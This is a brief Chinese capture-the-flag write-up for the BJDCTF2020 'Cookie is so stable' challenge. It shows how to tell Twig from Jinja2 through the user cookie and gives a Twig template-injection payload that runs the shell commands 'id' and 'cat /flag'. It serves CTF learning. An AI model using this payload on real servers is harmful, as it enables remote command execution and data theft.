标签:cookie ref sha 攻击 proc http env process size
知识点
题目提示cookie
在user处尝试注入
{{7*‘7‘}} 回显7777777 ==> Jinja2
{{7*‘7‘}} 回显49 ==> Twig
这里为Twig
payload
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
获取flag
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
[BJDCTF2020]Cookie is so stable
标签:cookie ref sha 攻击 proc http env process size
原文地址:https://www.cnblogs.com/mech/p/12892111.html